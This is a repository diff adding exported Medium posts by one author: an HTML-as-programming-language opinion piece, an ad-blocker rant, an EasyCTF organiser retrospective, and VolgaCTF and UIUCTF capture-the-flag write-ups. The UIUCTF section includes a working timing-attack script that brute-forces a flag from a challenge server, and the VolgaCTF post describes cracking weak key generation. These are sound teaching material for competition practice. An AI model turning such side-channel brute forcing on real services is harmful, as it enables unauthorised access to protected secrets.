<li name="ede6" id="ede6" class="graf graf--li graf-after--p"><strong
|
||||||
|
class="markup--strong markup--li-strong">programming</strong>: It’s when you tell a computer what to
|
||||||
|
do. For example, I can program a bot to respond to messages while I’m away. Or I can program my phone to
|
||||||
|
wake up at 7:30 in the morning. It’s all the same.</li>
|
||||||
|
<li name="2b5d" id="2b5d" class="graf graf--li graf-after--li"><strong
|
||||||
|
class="markup--strong markup--li-strong">language</strong>: A standard method of communication that is
|
||||||
|
accepted by both the speaker and the receiver. Except in this context, it’s not with humans but a
|
||||||
|
machine, so you’re not really speaking.</li>
|
||||||
|
</ul>
|
||||||
|
<p name="832d" id="832d" class="graf graf--p graf-after--li">Following those definitions, a programming
|
||||||
|
language must be a method of communicating to the computers what you want it to do. These are rather loose
|
||||||
|
definitions that I came up with, but if you don’t agree with that, you can stop reading now.</p>
|
||||||
|
<p name="ecc9" id="ecc9" class="graf graf--p graf-after--p">The primary purpose of HTML is to serve as a
|
||||||
|
method to display webpage data that is received from the server into a visual representation into your
|
||||||
|
browser. That’s just a fancy way of saying “you tell the browser where to put stuff”. Let’s check if that
|
||||||
|
satisfies the above points:</p>
|
||||||
|
<ul class="postList">
|
||||||
|
<li name="d874" id="d874" class="graf graf--li graf-after--p">You’re telling the computer how to display
|
||||||
|
elements!</li>
|
||||||
|
<li name="2ae6" id="2ae6" class="graf graf--li graf-after--li">You’re using a system of communication that
|
||||||
|
both you and the computer understand.</li>
|
||||||
|
</ul>
|
||||||
|
<p name="fafb" id="fafb" class="graf graf--p graf-after--li">If you don’t agree that the above two
|
||||||
|
demonstrate that HTML satisfies the requirements for a programming language that I laid out above, then
|
||||||
|
I’d love to hear your thoughts.</p>
|
||||||
|
<p name="fbd3" id="fbd3" class="graf graf--p graf-after--p">So why are people so insistent that HTML is not
|
||||||
|
a programming language? Well, here’s some of the reasons I’ve seen so far.</p>
|
||||||
|
<ul class="postList">
|
||||||
|
<li name="7225" id="7225" class="graf graf--li graf--startsWithDoubleQuote graf-after--p">“You can’t
|
||||||
|
perform arithmetic operations with HTML.” You can’t perform arithmetic operations with HTML because
|
||||||
|
that’s not what it was made for. that’s like trying to use a hammer to screw in a screw. Doesn’t make it
|
||||||
|
any less of a tool.</li>
|
||||||
|
<li name="4e0d" id="4e0d" class="graf graf--li graf--startsWithDoubleQuote graf-after--li">“It can’t
|
||||||
|
process data.” Refer to the first point about arithmetic operations.</li>
|
||||||
|
<li name="3e94" id="3e94" class="graf graf--li graf--startsWithDoubleQuote graf-after--li">“It doesn’t
|
||||||
|
produce executable code.” Why not? Let’s say I put this line into an HTML file: <code
|
||||||
|
class="markup--code markup--li-code"><br /></code>. Is it not telling the browser to create a
|
||||||
|
line break? Isn’t that making it execute an instruction? Sure, you can say that the HTML isn’t actually
|
||||||
|
creating the element, it’s the browser engine. But by that logic, no programming language actually
|
||||||
|
exists other than the binary data that the machine is executing, since that’s what’s really executing
|
||||||
|
all our code. If you don’t put the elements in, the browser won’t do anything, so HTML is giving the
|
||||||
|
browser instructions on what to do.</li>
|
||||||
|
<li name="537f" id="537f" class="graf graf--li graf--startsWithDoubleQuote graf-after--li">“It’s not
|
||||||
|
Turing-complete.” Where did the requirement that programming languages had to be Turing-complete come
|
||||||
|
in? Just because your hammer isn’t a Swiss army knife that can do everything, doesn’t make it any less
|
||||||
|
of a tool.</li>
|
||||||
|
</ul>
|
||||||
|
<p name="28c1" id="28c1" class="graf graf--p graf-after--li graf--trailing">At the end of the day, this is
|
||||||
|
all just still my opinion. If you don’t agree, please voice your opinions and convince me otherwise
|
||||||
|
(preferably using well-informed arguments)!</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/ccf34bd2758c"><time class="dt-published" datetime="2017-01-14T09:07:31.000Z">January
|
||||||
|
14, 2017</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/why-i-think-html-is-a-programming-language-ccf34bd2758c"
|
||||||
|
class="p-canonical">Canonical link</a></p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
|
@ -0,0 +1,33 @@
|
||||||
|
---
|
||||||
|
title: So, you can detect whether I use an ad-blocker or not, eh?
|
||||||
|
date: 2017-02-16T03:07:43.893Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="fb3e" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="3093" id="3093" class="graf graf--p graf-after--h3">Guess it’s one less site I’m going to be
|
||||||
|
wasting my time on now.</p>
|
||||||
|
<p name="55ab" id="55ab" class="graf graf--p graf-after--p">I know it’s an important part of making revenue
|
||||||
|
or whatever, but from the user’s standpoint, ads should be <em
|
||||||
|
class="markup--em markup--p-em">non-intrusive</em>. That means I should be able to do whatever I want on
|
||||||
|
the site without needing to bother looking at your advertisements.</p>
|
||||||
|
<p name="14a3" id="14a3" class="graf graf--p graf-after--p graf--trailing">Don’t push advertisements into my
|
||||||
|
face. Promote good content that people want to see, and they’ll automatically come back for more. Because
|
||||||
|
to be honest, I don’t really care about your site enough to turn off my ad-blocker for it.</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/3856335f209c"><time class="dt-published" datetime="2017-02-16T03:07:43.893Z">February
|
||||||
|
16, 2017</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/so-you-can-detect-whether-i-use-an-ad-blocker-or-not-eh-3856335f209c"
|
||||||
|
class="p-canonical">Canonical link</a></p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
133
src/content/posts/2017-03-24_EasyCTF-2017-Wrap-up.md
Normal file
133
src/content/posts/2017-03-24_EasyCTF-2017-Wrap-up.md
Normal file
|
@ -0,0 +1,133 @@
|
||||||
|
---
|
||||||
|
title: EasyCTF 2017 Wrap-up
|
||||||
|
date: 2017-03-24T11:36:40.681Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="5ea1" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="398b" id="398b" class="graf graf--p graf-after--h3">EasyCTF just concluded this Monday! Looking
|
||||||
|
back on the competition, I’d say that this year was our best year ever. Let’s take a look at some of the
|
||||||
|
stats.</p>
|
||||||
|
<ul class="postList">
|
||||||
|
<li name="2082" id="2082" class="graf graf--li graf-after--p"><strong
|
||||||
|
class="markup--strong markup--li-strong">5,837</strong> users registered this year, playing on <strong
|
||||||
|
class="markup--strong markup--li-strong">2,742</strong> teams. Of those teams, <strong
|
||||||
|
class="markup--strong markup--li-strong">1,938</strong> teams scored points.</li>
|
||||||
|
<li name="0fe5" id="0fe5" class="graf graf--li graf-after--li">We had <strong
|
||||||
|
class="markup--strong markup--li-strong">63</strong> challenges, which was close to our 68 last year.
|
||||||
|
</li>
|
||||||
|
<li name="1105" id="1105" class="graf graf--li graf-after--li"><strong
|
||||||
|
class="markup--strong markup--li-strong">10.7%</strong> of all teams had 5 members — full teams! In
|
||||||
|
fact, there were more 5-member teams than there were 4-, 3-, and 2-member teams.</li>
|
||||||
|
</ul>
|
||||||
|
<p name="9393" id="9393" class="graf graf--p graf-after--li">I’m really happy to see that so many people
|
||||||
|
were willing to give us a week of their time to participate in our event and work through our challenges,
|
||||||
|
despite the fact that we hadn’t promised any prizes ahead of time.</p>
|
||||||
|
<p name="a95a" id="a95a" class="graf graf--p graf-after--p">I’d also like to give a shout-out to the entire
|
||||||
|
dev team who helped monitor basically every point of contact that people had with us and creating amazing
|
||||||
|
challenges.</p>
|
||||||
|
<h3 name="17c6" id="17c6" class="graf graf--h3 graf-after--p">Improvements for next year</h3>
|
||||||
|
<p name="80aa" id="80aa" class="graf graf--p graf-after--h3">I still haven’t decided whether I’ll be
|
||||||
|
completely involved in organizing this event again next year. I hope that I’ll have some free time
|
||||||
|
alongside my classes, but I’d also like some more cooperation from the rest of the organizers. The biggest
|
||||||
|
problem we had this year was basically not working on anything until the week before the competition. By
|
||||||
|
that time, it was already too late. Let’s take a closer look at what actually went wrong:</p>
|
||||||
|
<ul class="postList">
|
||||||
|
<li name="09a8" id="09a8" class="graf graf--li graf-after--p"><strong
|
||||||
|
class="markup--strong markup--li-strong">Lack of motivation.</strong> I’m not sure people were
|
||||||
|
actually busy during the entire year that we had planned to work, but there was definitely a lack of
|
||||||
|
work put into organizing the competition. We had some big ideas at the beginning of the year, but as
|
||||||
|
time passed, the chances of those ideas becoming reality looked rather slim as no one wanted to be the
|
||||||
|
first one to start working. Somewhere in there I threw in a couple of deadlines, and we got a couple of
|
||||||
|
problems written. Had I not done that, I fear we would have had much fewer problems than we actually
|
||||||
|
did.</li>
|
||||||
|
<li name="6dea" id="6dea" class="graf graf--li graf-after--li"><strong
|
||||||
|
class="markup--strong markup--li-strong">No contact with sponsor companies.</strong> Contacting
|
||||||
|
sponsors should have been one of the first things we did, since it takes a long time to sort out details
|
||||||
|
and companies usually take at least two weeks to reply to emails anyway. Towards the end, we did get an
|
||||||
|
email from DigitalOcean saying they were willing to fund servers for our competition, but launch day
|
||||||
|
came and we didn’t hear back from them again.</li>
|
||||||
|
<li name="135a" id="135a" class="graf graf--li graf-after--li"><strong
|
||||||
|
class="markup--strong markup--li-strong">No coordination.</strong> Some of the feedback I’ve been
|
||||||
|
hearing about this year’s competition is a shortage of actually “easy” problems. We never really went
|
||||||
|
through the competition and tried to lay out a “spectrum” of problems nor tackle it from the
|
||||||
|
participants’ perspective. Every problem was either just a “cool idea” someone had or “I feel like a CTF
|
||||||
|
needs this.” The intermediate web section was completely missing.</li>
|
||||||
|
<li name="f9eb" id="f9eb" class="graf graf--li graf-after--li"><strong
|
||||||
|
class="markup--strong markup--li-strong">Unbalanced team.</strong> Our team comprised mainly of
|
||||||
|
problem writers. That’s great and all, but when it comes to things like contacting sponsor companies,
|
||||||
|
writing the website, planning some kind of game, we basically have no resources to do those. I spent my
|
||||||
|
entire time developing OpenCTF, the platform that powered the competition, and I know for sure that was
|
||||||
|
a task too large for me to handle. Getting more web designers or people with other skills would have
|
||||||
|
helped out a lot.</li>
|
||||||
|
</ul>
|
||||||
|
<p name="e77f" id="e77f" class="graf graf--p graf-after--li">I’ve also got a couple of points of reflection
|
||||||
|
for prospective CTF organizers, so if you’re planning to run a CTF, this is for you.</p>
|
||||||
|
<ul class="postList">
|
||||||
|
<li name="f14f" id="f14f" class="graf graf--li graf-after--p"><strong
|
||||||
|
class="markup--strong markup--li-strong">Participant experience takes first priority.</strong> A lot
|
||||||
|
of organizers think the hardest part of running a CTF is getting good challenges. And they’d be right.
|
||||||
|
But that’s not to say that preparing a solid game infrastructure for flag submission is going to be
|
||||||
|
something you can do last-minute. When it comes to the participants’ experience, the first thing that
|
||||||
|
they encounter is the website. Then a few initial challenges. Then probably the chat. Make sure you have
|
||||||
|
those down well and people will probably have a better initial impression of your CTF.</li>
|
||||||
|
<li name="f87b" id="f87b" class="graf graf--li graf-after--li"><strong
|
||||||
|
class="markup--strong markup--li-strong">Some people are there to make you miserable.</strong> As the
|
||||||
|
one in control, you need to account for those people. We’re lucky that we only had relatively few
|
||||||
|
encounters with such people but do keep in mind that you are still running an event and that takes first
|
||||||
|
priority. During EasyCTF, there were a couple of people who thought it was funny to drop flags for hard
|
||||||
|
challenges into the chat room. When we tried to get them to stop, they would come back under different
|
||||||
|
aliases in order to annoy us. At that point we just shut down the entire chat room; the competition had
|
||||||
|
to go on.</li>
|
||||||
|
<li name="dd6b" id="dd6b" class="graf graf--li graf-after--li"><strong
|
||||||
|
class="markup--strong markup--li-strong">Ignore unconstructive negative feedback.</strong> You’re
|
||||||
|
always going to have haters. Don’t take it to heart, solve the problems, and move on. Who cares if some
|
||||||
|
random kid in IRC says your CTF is garbage? Ask them what issues they’re having, fix them, and they’ll
|
||||||
|
be happy. It’s really not that complicated.</li>
|
||||||
|
<li name="2add" id="2add" class="graf graf--li graf-after--li"><strong
|
||||||
|
class="markup--strong markup--li-strong">Docker.</strong> Is probably a good idea. The learning curve
|
||||||
|
is not bad and it’s a great way to create disposable containers that can restart easily. Not only should
|
||||||
|
you use Docker for your main competition website, you should also use it for all of the challenges that
|
||||||
|
involve communicating with a server.</li>
|
||||||
|
</ul>
|
||||||
|
<p name="56ba" id="56ba" class="graf graf--p graf-after--li">Here’s something else I definitely have to
|
||||||
|
share. We had this autogen system that created different flags for different teams in order to discourage
|
||||||
|
flag sharing. Some people came up to us reporting that their flag wasn’t working, when they clearly just
|
||||||
|
took some other team’s flag. I didn’t really do anything about it, but just thought it was pretty funny
|
||||||
|
that they had the nerve to report it to us even though they were cheating.</p>
|
||||||
|
<p name="683f" id="683f" class="graf graf--p graf-after--p">So, what’s the future for EasyCTF?</p>
|
||||||
|
<ul class="postList">
|
||||||
|
<li name="7263" id="7263" class="graf graf--li graf-after--p">I’m seeing OpenCTF as a more permanent
|
||||||
|
solution to our main platform. It’s a very complex piece of software and it would be insane to try to
|
||||||
|
rewrite it from scratch. I’m in the process of creating an open-source version of it and making it
|
||||||
|
customizable (for example, turning off features that you don’t need like the programming judge) for CTF
|
||||||
|
organizers.</li>
|
||||||
|
<li name="b2ec" id="b2ec" class="graf graf--li graf-after--li">We had this project going on a while back
|
||||||
|
for a CTF calendar that also hosted tasks. I was also hoping that it would be able to replay entire
|
||||||
|
competitions but that seems a bit too hopeful at this point. It would be nice to just get the calendar
|
||||||
|
revived.</li>
|
||||||
|
<li name="bc5e" id="bc5e" class="graf graf--li graf-after--li">WeebCTF is happening again this summer,
|
||||||
|
dates still yet to be decided. If you’re into anime (or even if you’re not), come check it out!</li>
|
||||||
|
<li name="ff8a" id="ff8a" class="graf graf--li graf-after--li">Applications for joining the organizing
|
||||||
|
team for the next EasyCTF will open soon. If there was something you didn’t like about EasyCTF, and you
|
||||||
|
think you could have done better, by all means, join the team! We’d like to hear your ideas.</li>
|
||||||
|
</ul>
|
||||||
|
<p name="ef5b" id="ef5b" class="graf graf--p graf-after--li graf--trailing">Thanks for reading, and I hope
|
||||||
|
I’ll be seeing you at the next CTF!</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/4bbd1ca68877"><time class="dt-published" datetime="2017-03-24T11:36:40.681Z">March
|
||||||
|
24, 2017</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/easyctf-2017-wrap-up-4bbd1ca68877" class="p-canonical">Canonical
|
||||||
|
link</a></p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
94
src/content/posts/2017-03-26_VolgaCTF-2017-Writeups.md
Normal file
94
src/content/posts/2017-03-26_VolgaCTF-2017-Writeups.md
Normal file
|
@ -0,0 +1,94 @@
|
||||||
|
---
|
||||||
|
title: VolgaCTF 2017 Writeups
|
||||||
|
date: 2017-03-26T21:52:31.553Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="0b53" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="e3cc" id="e3cc" class="graf graf--p graf-after--h3">I participated in VolgaCTF under the team Shell
|
||||||
|
Smash. We finished in 138th place with 600 points. Here are the write-ups for the problems that I did.</p>
|
||||||
|
<h3 name="bb61" id="bb61" class="graf graf--h3 graf-after--p">VC (50 points)</h3>
|
||||||
|
<p name="f5dc" id="f5dc" class="graf graf--p graf-after--h3">This was a pretty standard image analysis
|
||||||
|
problem. We are given two images that are relatively similar, except for a couple of bytes. If we just xor
|
||||||
|
the two images together, the flag appears in plain sight.</p>
|
||||||
|
<figure name="dee3" id="dee3" class="graf graf--figure graf--iframe graf-after--p">
|
||||||
|
<script src="https://gist.github.com/failedxyz/a7958fd7b5fff2c7b04de034cb9bc199.js"></script>
|
||||||
|
</figure>
|
||||||
|
<h3 name="1171" id="1171" class="graf graf--h3 graf-after--figure">PyCrypto (100 points)</h3>
|
||||||
|
<p name="3968" id="3968" class="graf graf--p graf-after--h3">We are given a Python file with an encrypt
|
||||||
|
function. It’s using an encryption function from the <code
|
||||||
|
class="markup--code markup--p-code">pycryptography.so</code> library that was also given. By analyzing
|
||||||
|
the so, it looks like the encryption algorithm is simply an xor with the key, and if the key is shorter
|
||||||
|
than the message, then just repeat the key. This algorithm is known as a vigenère cipher, or repeating-key
|
||||||
|
xor cipher. Fortunately, I had some old code to crack this type of cipher exactly from cryptopals.</p>
|
||||||
|
<figure name="a89f" id="a89f" class="graf graf--figure graf--iframe graf-after--p">
|
||||||
|
<script src="https://gist.github.com/failedxyz/425c663e1cb56caa328a1e263ec1565e.js"></script>
|
||||||
|
</figure>
|
||||||
|
<h3 name="df11" id="df11" class="graf graf--h3 graf-after--figure">Angry Guessing Game (200 points)</h3>
|
||||||
|
<p name="9dc1" id="9dc1" class="graf graf--p graf-after--h3">The first step was to open this binary in IDA.
|
||||||
|
It’s easy to get lost, because there are so many functions, so the first thing I did was hit Shift+F12 and
|
||||||
|
look at the strings. The one I was looking for, in particular, was “You’ve entered the correct license
|
||||||
|
key!” If I found where this was called during execution, I could trace it back to the actual place where
|
||||||
|
it performs the check.</p>
|
||||||
|
<figure name="ca83" id="ca83" class="graf graf--figure graf-after--p"><img class="graf-image"
|
||||||
|
data-image-id="1*tOWToDf10V2YnUScoVAlhg.png" data-width="972" data-height="144"
|
||||||
|
src="https://cdn-images-1.medium.com/max/800/1*tOWToDf10V2YnUScoVAlhg.png">
|
||||||
|
<figcaption class="imageCaption">Using the strings to follow execution.</figcaption>
|
||||||
|
</figure>
|
||||||
|
<p name="4cd9" id="4cd9" class="graf graf--p graf-after--figure">Here you can see I’ve found that sub_5F70
|
||||||
|
contains the code that checks whether you’ve already played 3 times, and tells the program to start asking
|
||||||
|
for a license key. Should it ask for a license key, it will redirect the execution to sub_6660, where it
|
||||||
|
actually prompts the user.</p>
|
||||||
|
<p name="990a" id="990a" class="graf graf--p graf-after--p">I’m going to start from the bottom of sub_6660,
|
||||||
|
trying to follow what it’s returning, because ultimately the result of this function is either going to be
|
||||||
|
true/false — whether it accepts your license key. Poking around, I found this call to an interesting
|
||||||
|
function: sub_67D0. Seems like it’s literally just checking your license key character by character.</p>
|
||||||
|
<figure name="e892" id="e892" class="graf graf--figure graf-after--p"><img class="graf-image"
|
||||||
|
data-image-id="1*m6YBCqASg66wa1I6IXlRtQ.png" data-width="484" data-height="776"
|
||||||
|
src="https://cdn-images-1.medium.com/max/800/1*m6YBCqASg66wa1I6IXlRtQ.png">
|
||||||
|
<figcaption class="imageCaption">The license key checker.</figcaption>
|
||||||
|
</figure>
|
||||||
|
<p name="ced2" id="ced2" class="graf graf--p graf-after--figure">I wonder what happens if you just convert
|
||||||
|
all of those values to ASCII?</p>
|
||||||
|
<figure name="fd19" id="fd19" class="graf graf--figure graf-after--p"><img class="graf-image"
|
||||||
|
data-image-id="1*KkjogeoBtk7d3Z-cslOu6w.png" data-width="667" data-height="785"
|
||||||
|
src="https://cdn-images-1.medium.com/max/800/1*KkjogeoBtk7d3Z-cslOu6w.png">
|
||||||
|
<figcaption class="imageCaption">The letters of the flag.</figcaption>
|
||||||
|
</figure>
|
||||||
|
<p name="780e" id="780e" class="graf graf--p graf-after--figure">Looks like our license key is the flag!</p>
|
||||||
|
<h3 name="25ef" id="25ef" class="graf graf--h3 graf-after--p">KeyPass (100 points)</h3>
|
||||||
|
<p name="ee4c" id="ee4c" class="graf graf--p graf-after--h3">I didn’t actually finish this one during the
|
||||||
|
competition time, because I was being really stupid and not reading their hint. In this challenge, they
|
||||||
|
handed out an encrypted flag and a program that “generates secure encryption keys.”</p>
|
||||||
|
<p name="53fd" id="53fd" class="graf graf--p graf-after--p">Picking apart the binary, it looks like what the
|
||||||
|
program is doing is just generating a seed out of the passphrase that you give to it, by xor’ing every
|
||||||
|
character of your passphrase together. This was then used in an LCG to get “random” bytes out of a
|
||||||
|
dictionary of 82 bytes.</p>
|
||||||
|
<p name="4045" id="4045" class="graf graf--p graf-after--p">The problem with this method is, there a total
|
||||||
|
of about 128 values for this “seed,” because ASCII values range from 0 to 128, and since higher bits are
|
||||||
|
not involved, xor will never go out of that range either. So to solve the problem, you simply generate all
|
||||||
|
of the keys for seeds from 0 to 128. I’ve reimplemented the key generation in Python here:</p>
|
||||||
|
<figure name="0cc9" id="0cc9" class="graf graf--figure graf--iframe graf-after--p">
|
||||||
|
<script src="https://gist.github.com/failedxyz/1cbc3a63152d095dca58f7b6d89a8b77.js"></script>
|
||||||
|
</figure>
|
||||||
|
<p name="acb2" id="acb2" class="graf graf--p graf-after--figure graf--trailing">So why couldn’t I finish it?
|
||||||
|
Because when I was actually checking the key with <code
|
||||||
|
class="markup--code markup--p-code">openssl aes-128-cbc -d -in flag.zip.enc -out flag.zip -pass env:PASSWORD</code>,
|
||||||
|
I wasn’t using the version of OpenSSL that they specified, version 1.1.0e. Lesson learned, I guess.</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/632fa7821dca"><time class="dt-published" datetime="2017-03-26T21:52:31.553Z">March
|
||||||
|
26, 2017</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/volgactf-2017-writeups-632fa7821dca" class="p-canonical">Canonical
|
||||||
|
link</a></p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
117
src/content/posts/2017-05-01_UIUCTF-2017-Writeups.md
Normal file
117
src/content/posts/2017-05-01_UIUCTF-2017-Writeups.md
Normal file
|
@ -0,0 +1,117 @@
|
||||||
|
---
|
||||||
|
title: UIUCTF 2017 Writeups
|
||||||
|
date: 2017-05-01T00:09:47.978Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="edd2" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="dca1" id="dca1" class="graf graf--p graf-after--h3">I competed in UIUCTF this year with Aaron Cao.
|
||||||
|
We ended up placing 23rd with 1300 points. Here are some of the solutions to the challenges I solved.</p>
|
||||||
|
<h3 name="f21d" id="f21d" class="graf graf--h3 graf-after--p">High School Crypto (100 points, crypto)</h3>
|
||||||
|
<p name="5d6b" id="5d6b" class="graf graf--p graf-after--h3">In this challenge, we are basically given some
|
||||||
|
encrypted information, as well as the following encryption program.</p>
|
||||||
|
<pre name="d6b3" id="d6b3"
|
||||||
|
class="graf graf--pre graf-after--p">import sys, itertools<br>if(len(sys.argv) != 3):<br> print("Usage: [FILE] [KEY]")<br> exit(-1)<br><br>filename = sys.argv[1]<br>key = sys.argv[2]<br><br>with open(filename, 'rb') as plaintext:<br> raw = plaintext.read()<br> print(len(raw))<br> with open(filename + '.out', 'wb') as ciphertext:<br> for l, r in zip(raw, itertools.cycle(key)):<br> ciphertext.write( (l ^ ord(r)).to_bytes(1, byteorder='big') )</pre>
|
||||||
|
<p name="2402" id="2402" class="graf graf--p graf-after--pre">Upon not-so-close inspection, it seems like
|
||||||
|
it’s just a repeated-xor cipher. Using code that I had written for Cryptopals Set 1, I decoded it quickly,
|
||||||
|
obtaining a long plaintext, containing the flag.</p>
|
||||||
|
<h3 name="1b1a" id="1b1a" class="graf graf--h3 graf-after--p">Thematic (100 points, recon)</h3>
|
||||||
|
<p name="318b" id="318b" class="graf graf--p graf-after--h3"><a
|
||||||
|
href="https://twitter.com/SwiftOnSecurity/status/858092845886046209"
|
||||||
|
data-href="https://twitter.com/SwiftOnSecurity/status/858092845886046209"
|
||||||
|
class="markup--anchor markup--p-anchor" rel="nofollow noopener"
|
||||||
|
target="_blank">https://twitter.com/SwiftOnSecurity/status/858092845886046209</a></p>
|
||||||
|
<h3 name="f8de" id="f8de" class="graf graf--h3 graf-after--p">Taylor’s Magical Flag Oracle (150 points,
|
||||||
|
reversing)</h3>
|
||||||
|
<p name="6c04" id="6c04" class="graf graf--p graf-after--h3">We’re given a flag-checking service that seems
|
||||||
|
to be vulnerable to timing attack. In essence, here’s what happens: the service checks our flag character
|
||||||
|
by character; if that character is the same, move on to the next, otherwise, just return false, since we
|
||||||
|
know that the string can’t be equal anyway. But in this case, the program delays by 0.25 — a significant
|
||||||
|
amount! — before moving on, to prevent brute force? apparently. But there’s one huge flaw.</p>
|
||||||
|
<p name="939a" id="939a" class="graf graf--p graf-after--p">If you brute force all of the possibilities for
|
||||||
|
the <em class="markup--em markup--p-em">next character</em>, there’s going to be a significant time gap
|
||||||
|
between returns if you submit the right character vs. if you submit the wrong one. Here’s what it means:
|
||||||
|
say I know the flag starts with <code class="markup--code markup--p-code">flag{</code> , which I do. Upon
|
||||||
|
submitting <code class="markup--code markup--p-code">flag{</code>, I know it’s going to be delaying for at
|
||||||
|
least 5 * 0.25, which is 1.25 seconds. I don’t know the 6th character yet, but there’s only 2 things that
|
||||||
|
can happen:</p>
|
||||||
|
<ul class="postList">
|
||||||
|
<li name="69d8" id="69d8" class="graf graf--li graf-after--p">I get it wrong; the program returns
|
||||||
|
immediately because it doesn’t hit the sleep, and my result is return in ~1.25 seconds, with a bit of
|
||||||
|
latency, but not enough to make it >1.5 seconds.</li>
|
||||||
|
<li name="95b5" id="95b5" class="graf graf--li graf-after--li">I get it right; the program sleeps for 0.25
|
||||||
|
before moving on because the pass has checked.</li>
|
||||||
|
</ul>
|
||||||
|
<p name="2016" id="2016" class="graf graf--p graf-after--li">Hopefully the problem becomes obvious now. If I
|
||||||
|
check how long it takes me to get my result, I’ll be able to “guess” the password character by character.
|
||||||
|
Knowing this, here is the script I used to get the flag:</p>
|
||||||
|
<pre name="f905" id="f905"
|
||||||
|
class="graf graf--pre graf-after--p">import socket<br>from functools import wraps<br>from time import time<br>from string import printable</pre>
|
||||||
|
<pre name="4d70" id="4d70"
|
||||||
|
class="graf graf--pre graf-after--pre">addr = ("challenge.uiuc.tf", 11340)<br>s = socket.socket()<br>s.connect(addr)</pre>
|
||||||
|
<pre name="05be" id="05be"
|
||||||
|
class="graf graf--pre graf-after--pre">def stopwatch(f):<br> <a href="http://twitter.com/wraps" data-href="http://twitter.com/wraps" class="markup--anchor markup--pre-anchor" title="Twitter profile for @wraps" rel="noopener" target="_blank">@wraps</a>(f)<br> def wrapper(*args, **kwargs):<br> start = time()<br> result = f(*args, **kwargs)<br> end = time()<br> return end - start<br> return wrapper</pre>
|
||||||
|
<pre name="017f" id="017f"
|
||||||
|
class="graf graf--pre graf-after--pre"><a href="http://twitter.com/stopwatch" data-href="http://twitter.com/stopwatch" class="markup--anchor markup--pre-anchor" title="Twitter profile for @stopwatch" rel="noopener" target="_blank">@stopwatch</a><br>def test_flag(flag):<br> global s<br> s.send(flag + "\n")<br> s.recv(20) # ></pre>
|
||||||
|
<pre name="4624" id="4624"
|
||||||
|
class="graf graf--pre graf-after--pre">s.recv(20) # ><br>known_flag = "flag{"<br>while True:<br> for c in printable:<br> benchmark = 0.25 * (len(known_flag) + 1)<br> actual = test_flag(known_flag + c)<br> print c, benchmark, actual<br> if actual > benchmark:<br> known_flag += c<br> print known_flag<br> break</pre>
|
||||||
|
<h3 name="0dea" id="0dea" class="graf graf--h3 graf-after--pre">babyrsa (200 points, crypto)</h3>
|
||||||
|
<pre name="c0da" id="c0da"
|
||||||
|
class="graf graf--pre graf-after--h3">n = 826280450476795403105390383916395625701073920777162153138597185953056944510888027904354828464602421249363674719063026424044747076553321187265165775178889032794638105579799203345357910166892700405175658568627675449699540840288382597105404255643311670752496397923267416409538484199324051251779098290351314013642933189000153869540797043267546151497242578717464980825955180662199508957183411268811625401646070827084944007483568527240194185553478349118552388947992831458170444492412952312967110446929914832061366940165718329077289379496793520793044453012845571593091239615903167358140251268988719634075550032402744471298472559374963794796831888972573597223883502207025864412727194467531305956804869282127211781893423868568924921460804452906287133831167209340798856323714333552031073990953099946860260440120550744737264831895097569281340675979651355169393606387485601024283179141075124116079680183641040638005340147490312370291020282845417263785200481799143148652902589069064306494803532124234850362800892646823909347208346956741220877224626765444423081432186871792825772139369254830825377015531518313838382717867736340509229694011716101360463757629023320658921011843627332643744464724204771008866440681008984222122706436344770910544932757<br>e = 5<br>c = 